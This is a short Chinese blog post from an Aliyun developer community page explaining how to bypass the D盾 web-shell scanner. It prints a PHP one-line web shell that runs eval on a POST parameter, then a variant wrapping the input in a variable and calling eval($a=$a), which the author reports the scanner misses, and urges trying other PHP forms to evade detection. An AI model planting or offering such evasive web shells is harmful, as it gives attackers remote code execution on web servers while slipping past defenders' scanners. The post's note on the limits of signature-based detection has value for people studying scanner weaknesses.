开发者社区> bypass> 正文
阿里云
为了无法计算的价值
打开APP
阿里云APP内打开

绕过D盾的一句话

简介: 一个很简单的一个技巧,作个笔记,可以绕过D盾检测。 新建test1.php 新建test2.php 使用D盾_Web查杀 V2.0.9 进行查杀,test1.php可以查杀出来,但是test2.php无法查杀。
+关注继续查看

 

一个很简单的一个技巧,作个笔记,可以绕过D盾检测。

新建test1.php

<?php
eval($_POST[g]);
?>

新建test2.php

<?php
$a="$_POST[g]";
eval($a=$a);
?>

使用D盾_Web查杀 V2.0.9 进行查杀,test1.php可以查杀出来,但是test2.php无法查杀。

那么问题就出现在eval($a=$a)这样的形式,eval()很容易就被查杀出来,但对于这样一种形式就无法查杀。

可以预见基于特征的代码查杀,在一定程度上能够检测出一些问题,但是对于一些特殊形式的变形,还是无法查杀。

PHP是一门很灵活的语言,可以通过它的特性,去尝试更多的函数形式,达到绕过的效果。

 

版权声明:本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《阿里云开发者社区用户服务协议》和《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。

相关文章
一句话总结LLE(流形学习)
一句话总结LLE(流形学习)
67 0
x3d
一句话日志之时间管理
今天看鸡汤看到的。 真正的时间管理,是选择也是放弃。 它不仅仅只是管理时间,还管理你的精力、你的欲望,最重要的是管理你的人生目标。 好吧,三句。
1302 0
一句话说清分布式锁,进程锁,线程锁
  在分布式集群系统的开发中,线程锁往往并不能支持全部场景的使用,必须引入新的技术方案分布式锁。 线程锁,进程锁,分布式锁   线程锁:大家都不陌生,主要用来给方法、代码块加锁。当某个方法或者代码块使用锁时,那么在同一时刻至多仅有有一个线程在执行该段代码。
6826 0
一句话输出网站404页面,REFER及相关排序
cat www.log|awk '$9~/404/ {print $7"," $11}'|sort|uniq -c|sort -nr > ./www404.csv
474 0
【原】记录一句话
作者:david_zhang@sh 【转载时请以超链接形式标明文章】 链接:http://www.cnblogs.com/david-zhang-index/p/4041782.html 今天在网上看到一句话: 我们有可能失败过,但没必须要痛苦,因为我们的人生完整了。
587 0
用sql合并列,两句话合为一句
合并bc两列 UPDATE `test` SET `a`=concat(`b`,`c`)  清空a列 UPDATE `test` SET `a` = NULL
625 0
每日一句
1.日久不一定生情,但一定能够见人心 2.董事长:是公司董事会的组织者,一般是股东的代表推举出来代表股东利益,负责监督公司日常运作的人;总裁:常常就是总经理,是股东聘任或者推荐的公司管理层的最高管理者;一般比较大的公司或者公司下属有几个较小或者专业的公司中,称呼总裁的为多,单一公司称总经理为多;CEO是首席执行官,主要负责公司的行政或者日常管理事务为主,这样的公司常常还有COO(首席运营官),CTO(首席技术官),CFO(首席财务官)等各个岗位。
691 0
一句话评论设计模式六大原则
原文链接:http://www.cnblogs.com/lancidie/archive/2012/02/03/2337168.html        原则,故名思议则是本质的意思。
899 0
+关注
bypass
一个网络安全爱好者
文章
问答
文章排行榜
最热
最新
相关电子书
更多
如何产生威胁情报-高级恶意攻击案例分析
立即下载
多媒体云公共资源化之后与资源盗用滥用者的攻防
立即下载
浅析WAF防御机制的非主流技术
立即下载